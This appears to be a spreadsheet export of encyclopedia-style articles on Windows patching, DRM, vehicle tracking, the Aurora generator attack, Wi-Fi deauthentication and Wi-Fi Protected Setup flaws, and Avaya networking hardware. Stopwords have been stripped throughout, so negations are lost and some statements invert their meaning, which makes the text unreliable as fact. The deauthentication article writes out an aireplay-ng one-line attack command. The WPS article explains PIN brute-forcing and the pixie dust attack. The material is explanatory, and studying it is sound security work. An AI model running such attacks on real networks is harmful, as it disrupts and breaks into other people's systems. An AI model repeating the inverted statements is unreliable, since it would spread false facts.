updating previous months releases latest copies files found latest full lite releases, smaller downloads designed reduce amount bandwidth needed distribution. version version autopatcher engine included user interface, "intelligent" scripting previous version, 5.1. changes version include: support windows vista windows media center edition; detections: windows media player, windows live messenger/msn messenger, directx, .net windows installer; microsoft office components detection: word, excel, powerpoint, outlook, access, project, publisher, onenote, frontpage, infopath, visio, sharepoint designer groove; detect hotfixes slipstreamed.new releases using version started 2007 release change release terminology. full releases replaced core releases. core releases still contain critical updates, recommended updates, optional updates, various tweaks present full releases, large add-ons moved separate add-on packs. lite releases longer exist, add-ons moved packs. update releases remained same, available every month update core release.autopatcher core releases cumulative; previous versions required. autopatcher update releases incremental; previous update releases since latest core release need installed first. thus, order install releases became: core addon(optional) update update ...]] legal complaint, temporary shutdown, creation 'apup' autopatcher team forced shut project receiving e-mail microsoft requesting stop distribution august 2007. microsoft cited security risks third party distribution patches reason behind decision. microsoft denied possibility circumventing windows genuine advantage protection software behind asked representative windows genuine advantage anything categorically told case, added windows update pre-vista versions windows accessed using firefox concern microsoft possible malicious code could redistributed certified microsoft updates."kaladis revealed autopatcher blog biggest concern project shut microsoft "people around globe [would] start writing custom modules start redistributing releases", adding security features autopatcher "would automatically flag releases unofficial", end-users choice unofficial releases spread malicious software would easy. result, autopatcher updater ("apup") tool created automatically download required patches microsoft's servers store file structure used previous autopatcher releases. once files downloaded "everything remains know it." subsequent developments after comeback project stagnated loss remaining programmer. apup tool allows updated scripts updates downloaded but, script maintainers unable errors programs expand abilities without programmer. however, user stepped bring life project creating newer updated programs based originals. plans exist create dynamic script system autopatcher allow script maintainers detect anything registry entries instead relying upon static preprogrammed detection set. version support added. sweeper.exe added clean modules folder files/directories belong. version active development apup deprecated absorbed autopatcher's main program. still download though. support windows versions: windows 2000 dropped microsoft. still autopatcher update but, script receiving much attention since microsoft dropped support. modules products microsoft office first autopatcher packages microsoft office released august 2007, consisting autopatcher office 2002 core, autopatcher office 2003 core, autopatcher office 2007 core autopatcher officepack addon.the autopatcher office releases follow naming structure autopatcher windows releases. custom modules possible produce custom "stand alone" modules autopatcher install third-party programs, tweaks etc. this useful, example, inside businesses bespoke software needs maintained. autopatcher team maintained list stand alone modules authenticated, signed packaged autopatcher, eligible inclusion add-on packs. also project dakota slipstream (computing) wsusoffline.net update downloader references external links official website what's next autopatcher? feature interview kaladis webuser.co.uk</t>
  </si>
  <si>
    <t>Automated system recovery</t>
  </si>
  <si>
    <t>automated system recovery (asr) feature windows operating system used simplify recovery computer's system boot volumes. consists parts: automated backup, automated restore. backup portion accessed backup utility system tools. back user files data, data necessary restoring systems configuration state. other backup systems place ensure user's actual data files also backed event failure, restore performed first, allows user files recovered. references external links recover windows automated system recovery</t>
  </si>
  <si>
    <t>Widevine</t>
  </si>
  <si>
    <t>widevine proprietary digital rights management (drm) technology google used chromium firefox browsers (including derivatives), android mediadrm, android consumer electronics devices. widevine technology supports various encryption schemes hardware security restrict consumer access distributed video content according rules defined content owners. widevine mainly provides content decryption module (cdm) client google chrome browsers devices. widevine free content providers charge fees license generation device integration. security levels three widevine security levels are: resolution restriction; highest level protection. both cryptography media processing operations occur trusted execution environment (tee). only cryptography operations executed tee, media processing. software-based only. usage widevine used chromium-based browsers android. supports mpeg-dash hls. google chrome chrome make encrypted media extensions media source extensions widevine, used decrypt content. over thirty chipsets, major desktop mobile operating systems, google properties chromecast android adopted widevine.companies including amazon prime video, bbc, hulu, netflix, spotify disney+ widevine manage distribution premium content.it also used firefox since v47, released 2016, enabled default microsoft windows optionally linux; disabled uninstalled browser settings. prior that, mozilla used adobe's primetime library versions. circumvention widevine circumvented least occasions researchers argued inherently insecure. digital video content, widevine circumvented analog hole. users open-source projects shaka player google-developed open-source html5 web-based player available github. shaka packager google-developed open-source content packaging solution available github. packager supports mpeg-dash linear based content. shaka streamer google-developed simple configuration-file-based tool preparing streaming media content. electron software framework widevine partnered castlabs integrate widevine client electron framework desktop application development. integration, however, still requires anyone wants distribute/use application sign license agreement google. kodi starting version add-on inputstream helper installs widevine automatically supported platforms playback. criticism 2019, developer tried bundle widevine electron/chromium-based application video playing response google asking license agreement, effectively blocking usage project. later reply: sorry we're supporting open source solution like happened electron projects. history widevine technologies vendor digital rights management software. early technologies included software system replaced smart cards eliminated cost logistical complexity card's distribution introduced abilities process sophisticated rights. purchased google 2010. references external links official website</t>
  </si>
  <si>
    <t>Automatic vehicle location</t>
  </si>
  <si>
    <t>automatic vehicle location (avl ~locating; telelocating means automatically determining transmitting geographic location vehicle. this vehicle location data, vehicles, collected vehicle tracking system manage overview vehicle travel. 2017, technology reached point transmitting device smaller size human thumb (thus easier conceal), able months battery charges, easy communicate smartphones (merely requiring duplicate card one's mobile phone carrier cases) less usd.most commonly, location determined using transmission mechanism sms, gprs, satellite terrestrial radio vehicle radio receiver. single antenna unit covering needed frequency bands employed. evdo common services applied, data rate needed avl, cost near-ubiquitous nature public networks. bandwidth requirements also allow satellite technology receive telemetry data moderately higher cost, across global coverage area remote locations covered well terrestrial radio public carriers. other options determining actual location, example environments illumination poor, dead reckoning, i.e. inertial navigation, active rfid systems cooperative rtls systems. these systems applied combination cases. addition, terrestrial radio positioning systems using frequency switched packet radio network also used alternative based systems. applications automatic vehicle locating powerful tool managing fleets vehicles service vehicles, emergency vehicles, public transport vehicles buses trains. also used track mobile assets, wheeled construction equipment, motorized trailers, mobile power generators. often utilized government agencies, public safety parks recreation, track movement patrol units, emergency responders, field workers. another purpose tracking provide graded service manage large driver crewing staff effectively. example, suppose ambulance fleet objective arriving location call service within minutes receiving request. using system allows evaluate locations vehicles service drivers crew order pick vehicle likely arrive destination fastest, (meeting service objective). types systems simple direction finding amateur radio cellular wireless systems direction finding triangulation transmitter signals radiated mobile. this sometimes called radio direction finding rdf. simplest forms systems calculate bearing fixed sites mobile. this creates triangle endpoints fixed points mobile. trigonometry tells roughly mobile transmitter located. wireless telephone systems, phones transmit continually off-hook, making continual tracking collection many location samples possible. this type location system required federal communications commission rules wireless enhanced 911. former loran-based locating motorola offered 1970s-era system based united states coast guard loran maritime navigation system. loran system intended ships signal levels east- west-coast areas adequate receivers automobiles. system marketed motorola model name metricom. consisted loran receiver data interface box/modem connected separate two-way radio. receiver interface calculated latitude longitude degrees, decimal degrees format based loran signals. this sent radio mdc-1200 mdc-4800 data system controller, plotted mobile's approximate location map. system worked reliably sometimes problems electrical noise urban areas. sparking electric trolley poles industrial plants radiated electrical noise sometime overwhelmed loran signals, affecting system's ability determine mobile's geolocation. because limited resolution, type system impractical small communities operational areas mine port. signpost systems track locate vehicles along fixed routes, technology called signpost transmitters employed. this used transit routes rail lines vehicles tracked continually operated linear route. transponder rfid chip along vehicle route would polled train traverses route. transponder passed, moving vehicle would query receive ack, handshake, signpost transmitter. transmitter mobile would report passing signpost system controller. this allows supervision, call center, dispatch center monitor progress vehicle assess whether vehicle schedule. these systems alternative inside tunnels conveyances signals blocked terrain. today's gps-based locating price ubiquity global positioning system equipment lent accurate reliable telelocation systems. signals impervious electrical noise sources require user install entire system. usually receiver collect signals satellite segment installed vehicle radio communicate collected location data dispatch point.large private telelocation systems send data receivers vehicles dispatch center private, user-owned radio backbone. these systems used businesses like parcel delivery ambulances. smaller systems justify building separate radio system cellular data services communicate location data vehicles dispatching center. location data periodically polled vehicle fleet central controller computer. simplest systems, data receiver displayed allowing humans determine location vehicle. more complex systems feed data computer assisted dispatch system automates process. example, computer assisted dispatch system check location call service pick list four closest ambulances. this narrows dispatcher's choice entire fleet easier choice four vehicles. some wireless carriers nextel decided best provide mandated location data wireless enhanced 9-1-1. newer nextel radios embedded receivers polled 9-1-1 dialed. 9-1-1 center provided latitude longitude radio's receiver. centers computer-aided dispatch, system assign address call based coordinates project icon depicting caller's location onto area. sensor-augmented main purpose using locate vehicles, also obtain information engine data, fuel consumption, driver data sensor data i.e. doors, freezer room trucks pressure. such data obtained can-bus, direct connections systems open systems ufdex sends receives data gprs pure ascii text format. because consists parts, modem additional embedded software contained microcontroller, systems fixed purposes unless connect open system expansion possibilities. with open system users send invoices based goods delivered exact location, time date data connected scale, rfid barcode readers, make fairly good automated system avoid human errors. countries high prices gasoline external fuel sensors used prevent cases fuel theft. logbook functions another scenario sensor functions connect driver information, collect data driving time, stops, even driver absence vehicle. driver/worker conditions hourly rates driving working outside same, monitored sensors, using ibutton personal identification devices. later analyzing log-file possible reports kind events, like stops, visited streets, speed limits violations, etc. differentiating automatic vehicle location events activated tracking systems might helpful draw distinction vehicle location systems track automatically event activated tracking systems track triggered event. there increasingly crossover different systems experience sector able draw number examples break rule. a.v.l (automatic vehicle location) this type vehicle tracking normally used fleet driver management sector. unit configured automatically transmit location time interval, e.g. every minutes. unit activated ignition switched on/off. e.a.t.s (events activated tracking system) this type system primarily used connection vehicle driver security solutions. example thief breaks attempts steal tracking system triggered immobiliser unit motion sensor activated. monitoring bureau automatically notified unit activated begin tracking vehicle. some products market hybrid eats technology. however industry practice tended lean towards separation functions. worth taking note vehicle tracking products tend fall one, technologies. technology predominantly used applying vehicle tracking fleet driver management solutions. automatic vehicle location given following scenario; breaks side road occupant calls vehicle recovery company. vehicle recovery company several vehicles operating area. without needing call driver check location dispatcher pinpoint nearest recovery vehicle assign job. incorporate aspects vehicle telematics scenario; dispatcher, rather phoning recovery vehicle operative, could transmit details directly operative's mobile data device, would in-vehicle satellite navigation journey job. eats technology predominantly used applying vehicle tracking vehicle security solutions. example distinction given following scenario; construction company owns pieces plant machinery regularly left unattended, weekends, building sites. thieves break onto site piece equipment, digger, loaded back flat truck driven away. typically ignition wouldn’t need turned products available wouldn’t typically activated. only products included unit activated motion sensor geofence alarm event, would activated. both eats systems track, often different purposes. special applications automatic vehicle locating vehicle location technologies used following scenarios: fleet management: managing fleet vehicles, knowing real-time location drivers allows management meet customer needs efficiently. vehicle location information also used verify legal requirements met: example, drivers taking rest breaks obeying speed limits. passenger information: real-time passenger information systems predictions based input show expected arrival departure times public transport services. asset tracking: companies needing track valuable assets insurance monitoring purposes plot real-time asset location closely monitor movement operating status. example, haulage logistics companies often operate trucks detachable load carrying units. case, trailers tracked independently cabs used drive them. combining vehicle location inventory management used reconcile item currently vehicle used identify physical location level individual packages. field worker management: companies field service sales workforce information vehicle tracking systems plan field workers' time, schedule subsequent customer visits able operate departments efficiently. covert surveillance: vehicle location devices attached covertly enforcement espionage organizations used track journeys made individuals surveillance also automatic number plate recognition fleet telematics tracking intelligent transportation system lojack mobile phone tracking nextbus, implementation used public transportation systems onstar, vehicle manufacturer implemented tracking systems. starchase telematics tracking system vehicle infrastructure integration vehicle tracking system references</t>
  </si>
  <si>
    <t>Aurora Generator Test</t>
  </si>
  <si>
    <t>idaho national laboratory aurora generator test 2007 demonstrate cyberattack could destroy physical components electric grid. experiment used computer program rapidly open close diesel generator's circuit breakers phase rest grid, thereby subjecting engine abnormal torques ultimately causing explode. this vulnerability referred aurora vulnerability. this vulnerability especially concern grid equipment supports using modbus legacy communications protocols designed without security mind. such, support authentication, confidentiality, replay protection. this means attacker communicate device control aurora vulnerability destroy experiment prepare experiment, researchers procured installed 2.25 (3000 horsepower) generator connected substation. they also needed access programmable digital relay another device capable controlling breaker. although access mechanical digital interface, case latter used.a generator unit consists diesel engine mechanically linked alternator. many commercial-industrial settings, multiple generators need operate together tandem, order provide power desired load. generator operating normally synchronized either power grid additional generators (for example "islanded" independent power network might used remote location emergency backup power). when generators operating synchronicity, effectively alternators magnetically locked together.in aurora experiment, researchers used cyberattack open close breakers sync, order deliberately maximize stress. each time breakers closed, torque induced alternator result out-of-synchrony connection) caused entire generator bounce shake. generator used experiment equipped resilient rubber rotating coupling (located diesel engine alternator, thus indirectly connecting engine's steel crankshaft alternator's steel shaft).during initial steps attack, black rubber pieces ejected rotating coupling incrementally destroyed result extremely abnormal torques induced out-of-synchronization alternator diesel engine's crankshaft). rotating rubber coupling soon destroyed outright, whereupon diesel engine quickly ripped apart, parts sent flying off. some parts generator landed feet away generator. addition massive obvious mechanical damage diesel engine itself, evidence overheating alternator later observed (upon subsequent disassembly unit).in attack, generator unit destroyed roughly three minutes. however, process took three minutes researchers assessed damage iteration attack. real attack could destroyed unit much quickly. example, generator built without rotating rubber coupling diesel engine alternator would experience crankshaft-destroying abnormal forces diesel engine immediately, given absence shock-absorbing material rotating components. generator unit assembled could diesel engine ruined single out-of-synchrony connection alternator.the aurora experiment designated unclassified, official only. september 2007, published article based information video released them, july 2014, released many documents related experiment part unrelated foia request. vulnerability aurora vulnerability caused out-of-sync closing protective relays."a close, imperfect, analogy would imagine effect shifting reverse driven highway, effect revving engine neutral shifting drive.""the aurora attack designed open circuit breaker, wait system generator slip synchronism, reclose breaker, protection system recognizes responds attack... traditional generator protection elements typically actuate block reclosing cycles. many variables affect time, every system needs analyzed determine specific vulnerability aurora attack... although main focus aurora attack potential 15-cycle window opportunity immediately target breaker opened, overriding issue fast generator moves away system synchronism." potential impact failure even single generator could cause widespread outages possibly cascading failure entire power grid occurred northeast blackout 2003. additionally, even outages removal single component (n-1 resilience), large window second attack failure could take year replace destroyed generator, many generators transformers custom-built. mitigations aurora vulnerability mitigated preventing out-of-phase opening closing breakers. some suggested methods include adding functionality protective relays ensure synchronism adding time delay closing breakers.one mitigation technique synchronism-check function protective relays potentially connect systems together. implement this, function must prevent relay closing unless voltage frequency within pre-set range. devices ieee sync-check relay ieee used prevent out-of-phase opening closing breakers.diesel engines also equipped independent sensors detect abnormal vibration signatures. possible design sensor immediately trigger complete shutdown generator upon detection single major excursion vibration signature normally operating engine. however, damage single excursion might already substantial, particularly resilient rubber coupling engine alternator present. criticisms there discussion whether aurora hardware mitigation devices (hmd) cause failures. 2011, quanta technology published article used rtds (real time digital simulator) testing examine "performance multiple commercial relay devices available" aurora hmds. quote: "the relays subject different test categories find performance dependable need operate, secure response typical power system transients faults, power swing load switching... general, technical shortcomings protection scheme’s design identified documented using real time testing results. rtds testing showed yet, single solution widely applied case, present required reliability level." presentation quanta technology dominion succinctly stated reliability assessment "hmds dependable, secure."joe weiss, cybersecurity control system professional, disputed findings report claimed misled utilities. wrote: "this report done great deal damage implying aurora mitigation devices cause grid issues. several utilities used quanta report basis installing aurora mitigation devices. unfortunately, report several questionable assumptions. they include applying initial conditions hardware mitigation designed address slower developing faults, nominal grid frequencies. existing protection address “slower” developing faults nominal grid frequencies (&lt;59 hz). aurora hardware mitigation devices fast out-of-phase condition faults currently gaps protection (i.e., protected device) grid." timeline march 2007, idaho national laboratory demonstrated aurora vulnerability.on june 2007, nerc notified industry aurora vulnerability.on september 2007, released previously classified demonstration video aurora attack homepage. that video downloaded here. october 2010, nerc released recommendation industry aurora vulnerability.on july 2014, department homeland security released pages documents related aurora. also brittle power electromagnetic pulse energy security list power outages york city blackout 1977 programmable logic controller resilient control systems vulnerability nuclear plants attack when technology fails metcalf sniper attack references external links http://www.langner.com/en/2014/07/09/aurora-revisited-by-its-original-project-lead/ http://www.powermag.com/what-you-need-to-know-and-dont-about-the-aurora-vulnerability/?printmode=1 http://breakingenergy.com/2013/09/13/the-all-too-real-cyberthreat-nobody-is-prepared-for-aurora/ http://www.computerworld.com/s/article/9039678/simulated_attack_points_to_vulnerable_u.s._power_infrastructure http://www.computerworld.com/s/article/9249642/new_docs_show_dhs_was_more_worried_about_critical_infrastructure_flaw_in_07_than_it_let_on http://threatpost.com/dhs-releases-hundreds-of-documents-on-wrong-aurora-project http://news.infracritical.com/pipermail/scadasec/2014-july/thread.html https://web.archive.org/web/20140903052039/http://www.thepresidency.org.70-32-102-141.pr6m-p7xj.accessdomain.com/sites/default/files/grid%20report%20july%2015%20first%20edition.pdf (page http://www.infosecisland.com/blogview/20925-misconceptions-about-aurora-why-isnt-more-being-done.html https://www.sce.com/wps/wcm/connect/c5fe765f-f66b-4d37-8e9f-7911fd6e7f3b/auroracustomeroutreach.pdf?mod=ajperes</t>
  </si>
  <si>
    <t>Automotive hacking</t>
  </si>
  <si>
    <t>Autosave</t>
  </si>
  <si>
    <t>autosave saving function many computer applications video games automatically saves current changes progress program game, helping reduce risk impact data loss case crash, freeze user error. autosaving typically done either predetermined intervals before, during, complex editing task begun. application software traditionally seen feature protect documents application system failure (crash), autosave backups often purged whenever user finishes work. alternative paradigm changes saved continuously paper) versions document available review. this would remove need saving documents entirely. there challenges implementation file, application operating system levels.for example, microsoft office, option called autorecover and, default, saves document every minutes temporary file directory. restarting office program crashing prompts user save last recovered version. however, protect users mistakenly click "no" asked save changes excel closes normally (except office 2013 later). autosave also syncs documents onedrive editing normally.mac 10.7 lion added autosave feature available applications, works conjunction time machine-like functionality periodically save versions document. this eliminates need manual saving, well providing versioning support system. version saved every five minutes, extended periods idle time, user uses "save version," replaces former "save" menu item takes command-s shortcut. saves made snapshots document data occur separate thread, user never paused process. applications need updated take advantage functionality, number apple's built-in programs updated release. autosave cannot disabled lion. first implementation feature appears text editor elvis. video games autosave common video games. many video games autosave feature saves progress session. example, adventure game, autosave completing level mission, fighting games, might save winning match. such points called savepoints; sometimes distinction checkpoint blurred. some games autosave method saving data, player must complete amount game saving takes place. still another autosaving anti-cheating device; example mega battle network games (except first), chip trader machines autosave upon giving battle chip player can't cheat soft resetting chip trader desired chip received. also persistent state references</t>
  </si>
  <si>
    <t>Wi-Fi deauthentication attack</t>
  </si>
  <si>
    <t>wi-fi deauthentication attack type denial-of-service attack targets communication user wi-fi wireless access point. technical details unlike radio jammers, deauthentication acts unique way. ieee 802.11 (wi-fi) protocol contains provision deauthentication frame. sending frame access point station called "sanctioned technique inform rogue station disconnected network".an attacker send deauthentication frame time wireless access point, spoofed address victim. protocol require encryption frame, even session established wired equivalent privacy (wep) data privacy, attacker needs know victim's address, available clear wireless network sniffing. usage evil twin access points main purposes deauthentication used hacking community force clients connect evil twin access point used capture network packets transferred client access point. attacker conducts deauthentication attack target client, disconnecting current network, thus allowing client automatically connect evil twin access point. password attacks order mount brute-force dictionary based password cracking attack wifi user wpa2 enabled, hacker must first sniff 4-way handshake. user elicited provide sequence first forcing offline deauthentication attack.in similar phishing style attack without password cracking, wifiphisher starts deauthentication attack disconnect user legitimate base station, mounts man-in-the-middle attack collect passwords supplied unwitting user. attacks hotel guests convention attendees federal communications commission fined hotels companies launching deauthentication attacks guests; purpose drive personal hotspots force on-site wi-fi services. toolsets aircrack-ng suite, mdk3, void11, scapy, zulu software mount wifi deauthentication attack. aireplay-ng, aircrack-ng suite tool, deauthentication attack executing one-line command: aireplay-ng xx:xx:xx:xx:xx:xx yy:yy:yy:yy:yy:yy wlan0 arms deauthentication attack mode number deauths send; infinite deauths xx:xx:xx:xx:xx:xx (access point) (media access control) address yy:yy:yy:yy:yy:yy target client address; omit deauthenticate clients wlan0 (network interface card)pineapple rogue access point issue deauth attack. also radio jamming ieee 802.11w offers increased security management frames including authentication/deauthentication references further reading nguyen, thuc nguyen, tran, hai; mittal, neeraj (august 2008), lightweight solution defending deauthentication/disassociation attacks 802.11 networks", proceedings 17th ieee international conference computer communications networks (icccn), thomas, virgin islands, usa, 185–190, citeseerx 10.1.1.310.1319, doi:10.1109/icccn.2008.ecp.51, isbn 978-1-4244-2389-7, s2cid 14833574(subscription required) author's link paywall) gps, wi-fi, cell phone jammers</t>
  </si>
  <si>
    <t>Wi-Fi Protected Setup</t>
  </si>
  <si>
    <t>wi-fi protected setup (wps; originally, wi-fi simple config) network security standard create secure wireless home network. created cisco introduced 2006, point protocol allow home users know little wireless security intimidated available security options wi-fi protected access, well making easy devices existing network without entering long passphrases. wi-fi protected setup allows owner wi-fi privileges block users using household wi-fi. owner also allow people wi-fi. this changed pressing button home router.a major security flaw revealed december 2011 affects wireless routers feature, recent models enabled default. flaw allows remote attacker recover hours brute-force attack and, pin, network's wpa/wpa2 pre-shared (psk). users urged turn feature, although possible router models. modes standard emphasizes usability security, allows four modes home network adding device network: method read either sticker display wireless device. this must entered "representant" network, usually network's access point. alternately, provided access point entered device. this method mandatory baseline mode everything must support wi-fi direct specification supersedes requirement stating devices keypad display must support method. push button method user push button, either actual virtual one, access point wireless client device. devices, discovery mode turns soon connection established delay (typically minutes less), whichever comes first, thereby minimizing vulnerability. support mode mandatory access points optional connecting devices. wi-fi direct specification supersedes requirement stating devices must support push button method. near-field communication method user bring client close access point allow near field communication devices. forum–compliant rfid tags also used. support mode optional. method user uses flash drive transfer data client device network's access point. support mode optional, deprecated.the last modes usually referred out-of-band methods transfer information channel wi-fi channel itself. only first modes currently covered certification. method deprecated part alliance's certification testing. some wireless access points dual-function button, holding button shorter longer time functions, factory-reset toggling wifi.some manufacturers, netgear, different logo and/or name wi-fi protected setup; wi-fi alliance recommends wi-fi protected setup identifier mark hardware button function. technical architecture protocol defines three types devices network: registrar device authority issue revoke access network; integrated wireless access point (ap), provided separate device. enrollee client device seeking join wireless network. access point functioning proxy registrar enrollee.the standard defines three basic scenarios involve components listed above: integrated registrar capabilities configures enrollee station (sta) case, session wireless medium series request/response messages, ending disassociating waiting reconnect configuration (handed before). registrar configures enrollee this case subdivided aspects: first, session could occur either wired wireless medium, second, could already configured time registrar found case wired connection devices, protocol runs universal plug play (upnp), devices support upnp purpose. when running upnp, shortened version protocol (only messages) authentication required joined wired medium. case wireless medium, session protocol similar internal registrar scenario, opposite roles. configuration state registrar expected user whether reconfigure keep current settings, decide reconfigure even describes configured. multiple registrars ability connect upnp intended apply wired medium, actually applies interface connection thus, manually wireless connection, upnp used manner wired connection. registrar configures enrollee case stands middle acts authenticator, meaning proxies relevant messages side side. protocol protocol consists series message exchanges triggered user action, relying exchange descriptive information precede user's action. descriptive information transferred information element (ie) added beacon, probe response, optionally probe request association request/response messages. other purely informative type–length–values, also hold possible currently deployed configuration methods device. after communication device capabilities ends, user initiates actual protocol session. session consists eight messages followed, case successful session, message indicate protocol completed. exact stream messages change configuring different kinds devices sta), using different physical media (wired wireless). band radio selection some devices dual-band wireless network connectivity allow user select band even particular radio ssid) using wi-fi protected setup, unless wireless access point separate button band radio; however, number later wireless routers multiple frequency bands and/or radios allow establishment session specific band and/or radio connection clients cannot ssid band (e.g., 2.4/5 ghz) explicitly selected user client connection (e.g. pushing ghz, supported, button wireless router force client device connect band session established client device cannot explicitly allow selection wireless network and/or band connection method). vulnerabilities online brute-force attack december 2011, researcher stefan viehböck reported design implementation flaw makes brute-force attacks pin-based feasible performed wps-enabled wi-fi networks. successful attack allows unauthorized parties gain access network, effective workaround disable wps. vulnerability centers around acknowledgement messages sent registrar enrollee attempting validate pin, eight-digit number used enrollees network. since last digit checksum previous digits, seven unknown digits pin, yielding 10,000,000 possible combinations. when enrollee attempts gain access using pin, registrar reports validity first second halves separately. since first half consists four digits (10,000 possibilities) second half three active digits (1000 possibilities), 11,000 guesses needed recovered. this reduction three orders magnitude number pins would required tested. result, attack completed four hours. ease difficulty exploiting flaw implementation-dependent, wi-fi router manufacturers could defend attacks slowing disabling feature several failed validation attempts.a young developer based small town eastern mexico created tool exploits vulnerability prove attack feasible. tool purchased tactical network solutions maryland million dollars. they state known vulnerability since early 2011 using it.in devices, disabling user interface result feature actually disabled, device remains vulnerable attack. firmware updates released devices allowing disabled completely. vendors could also patch vulnerability adding lock-down period wi-fi access point detects brute-force attack progress, disables method long enough make attack impractical. offline brute-force attack summer 2014, dominique bongard discovered called pixie dust attack. this attack works default implementation several wireless chip makers, including ralink, mediatek, realtek broadcom. attack focuses lack randomization generating e-s1 e-s2 "secret" nonces. knowing nonces, recovered within couple minutes. tool called pixiewps developed version reaver developed automate process.since client access point (enrollee registrar, respectively) need prove know make sure client connecting rogue attacker already hashes contain half pin, need brute-force actual pin. access point sends hashes, e-hash1 e-hash2, client, proving also knows pin. e-hash1 e-hash2 hashes (e-s1 psk1 pkr) (e-s2 psk2 pkr), respectively. hashing function hmac-sha-256 uses "authkey" used hash data. physical security issues methods vulnerable usage unauthorized user wireless access point kept secure area. many wireless access points security information factory-secured) printed them; also often found configuration menus wireless access point. cannot changed disabled, remedy firmware update enable changed, replace wireless access point. possible extract wireless passphrase following methods using special tools: wireless passphrase extracted using windows vista newer versions windows, administrative privileges connecting method bringing properties wireless network clicking "show characters". simple exploit intel proset wireless client utility reveal wireless passphrase used, simple move dialog asks want reconfigure access point. references external links wi-fi protected setup knowledge center wi-fi alliance upnp device architecture us-cert vu#723755 waiting pixie dust attack (offline attack) hacklu2014 offline bruteforce attack</t>
  </si>
  <si>
    <t>Avaya ERS 5500 Series</t>
  </si>
  <si>
    <t>ethernet routing switch 5500 series (ers 5500) series stackable, layer switches used computer networking. 5000 originally designed nortel manufactured avaya. 5000 series switches stacked gbit/s fast stacking configuration. this switch used access layer device 2010 winter olympics games. access switches supported 8782 voice-over-ip telephones. switches integrated time-domain reflectometer (tdr) built every copper port, providing diagnostic monitoring troubleshooting capabilities connected cables allowing troubleshooting cable defects (crimped, cut, shorted damaged cables) telnet, snmp, console management interfaces. this test provides reliable test identify cable good faulty. switches also include integrated packet sniffer built every port export information page report (see right, example talkers switch) export information ipfix server. base reports report talkers. reports also created sorted source address, destination address, tos, protocol, port number, source destination ports, packet count, byte count, first last packet times. multiple ports monitored simultaneously individually. license required enable function. management system accomplished serial console (which presents menu structure command line interface), interface device manager tools, uses snmp communicate device. scaling system scaling accomplished stacking maximum eight units. full stack 5530 systems provides copper 10/100/1000base-t ports, 1000base-x small form-factor pluggable transceiver ports, gigabit ethernet ports. full stack 5510-48t, 5520-48t systems provides ports—352 fixed copper 10/100/1000base-t ports, switchable copper/sfp ports. stacks consist 5500 series systems. software version major features ipfix part standard software package license required. username password security enhanced expansion password history ten. support sfp. 802.1x dynamic authorization extension allows third-party devices dynamically change vlans close user sessions. version major features enterprise device manager replaced java-based device manager well web-based management. automatic engine enhanced, including ability adac, 802.1ab simultaneously. dual syslog server support allows syslog messages simultaneously recorded onto servers once, case becomes unavailable. energy-saving implementations reduce energy decreasing energy usage non-peak hours. multicast groups scaled three different levels. also power ethernet references further reading nortel ethernet routing switch solutions (first ed.). research triangle park, nortel press. october 2008. 540. isbn 978-0-9815218-1-7. tolly group engineers (june 2005). "performance evaluation nortel resilient terabit cluster solution report 205116" (pdf). tolly enterprises, llc. archived original (pdf) july 2011. retrieved july 2011. tolly group engineers (may 2008). "converged data network solution ethernet routing switch application switch report 208268" (pdf). tolly enterprises, llc. retrieved august 2011. tolly group engineers (march 2010). "evaluation energy consumption projected cost converged campus, data center report 210110" (pdf). tolly enterprises, llc. archived original (pdf) september 2011. retrieved july 2011. bailey, david 2009). "nortel unveiled ethernet routing switch (ers) 5600 series, extending ethernet data series network hardware aimed burgeoning unified communications market". news. retrieved 2011. duffy, november 2007). "nortel bolsters security, business process gear". world. retrieved 2011. "avaya cisco: comparison infrastructure info-tech research group" (pdf). info-tech research group. april 2010. retrieved july 2011. tolly group engineers (february 2007). "ethernet routing switches, 5500, 1600, 8300, 8600 report 207171" (pdf). tolly enterprises, llc. archived original (pdf) july 2011. retrieved march 2012. external links</t>
  </si>
  <si>
    <t>Avaya ERS 8800 Series</t>
  </si>
  <si>
    <t>avaya ethernet routing switch 8800 series 8800, range modular chassis products combine hardware router switch used computer networking, designed manufactured avaya. when 8000 chassis, passive device right, equipped 8895 sf/cpu, system known ethernet routing switch 8800; conversely, equipped 8692 sf/cpu module (with supermezz) system known ethernet routing switch 8600. history december 2011 system completed evaluation certification u.s. joint interoperability test command (jitc) testing center united states department defense assured services local area network (aslan). general performance switch architecture 8800 supports gigabits second gross throughput. switch fabric performs gigabits second active/active configuration frame forwarding rate million packets second. frame length 1,518 bytes, jumbo frame support 9,600 bytes. 8800 supports groups multi-link trunks, links group; additionally, also support 4,000 vlans, multiple spanning tree groups, thousand addresses, 1,972 interfaces. references further reading "radvision, avaya announce offerings interop". networkworld. april 2010. retrieved july 2011. "avaya extends network virtualisation campus". total telecom. february 2011. archived original july 2011. retrieved july 2011.</t>
  </si>
  <si>
    <t>Avaya Secure Router 4134</t>
  </si>
  <si>
    <t>avaya secure router 4134 sr-4134) telecommunications computer networking technologies device manufactured avaya combines functions routing, stateful firewall security, ethernet switching, telephony, microsoft mediation device. addition sharing many features routers vrrp, mpls, hot-switchable modules, sr-4134 also guards individual circuit failures, ability recover device failures less second, instantly restores bandwidth connection repaired. system energy efficient, save owner much energy total cost ownership according testing tolly group. july 2011 integrated silver peak optimization appliance optimize performance enterprise voice, video, unified communications (uc), ensure remote users fast reliable access centralized applications. operational deployment this system normally installed headquarters, regional branch office connected across wide area network another router secure router regional, branch smaller remote location. modules several telecommunication modules t1/e1 ports (clear channel channelized) allow system operate wide range telecommunication circuits. addition supporting seventy-two power ethernet ports, secure router 4134 also support thirty-one t1/e1 ports, fifty-eight gigabit ethernet switching ports, sixty-four ports.the firewall capable supporting session initiation protocol (sip) alg, network translation cone network translation unistim protocol). security avaya secure router 4134 fully integrated firewalls vpns increased reliability; also includes stateful packet firewall prevention distributed denial service attacks. cryptographic module validation (fips140-1 fips 140-2) sr-2330 validated conforming digital signature algorithm (dsa) specified fips 186-2 change notice dated october 2001 fips 186-3 dated june 2009, titled digital signature standard (dss). nist validated secure hash algorithms also avaya network security avaya professional credentials references further reading tolly group engineers (january 2010). "avaya secure router 4134 cisco 3845: performance analysis evaluation branch router deployments report 210111". tolly enterprises, llc. {{cite journal}}: cite journal requires |journal= (help) tolly group engineers (march 2009). "nortel secure router 4134 cisco 3845: performance analysis evaluation branch router deployments 209104". tolly enterprises, llc. {{cite journal}}: cite journal requires |journal= (help) kerner, michael 2007). "nortel: we're back we're 'hyper'". internet news. archived original june 2011. retrieved august 2011. microsoft (may 2010). "unified communications open interoperability program". microsoft.com. retrieved august 2011. musich, paula 2007). "nortel reveals data networking strategy". baseline. retrieved 2011. "unified communications showdown: avaya cisco". info-tech research group inc. january 2010. retrieved 2011. external links secure router 4134 series retrieved 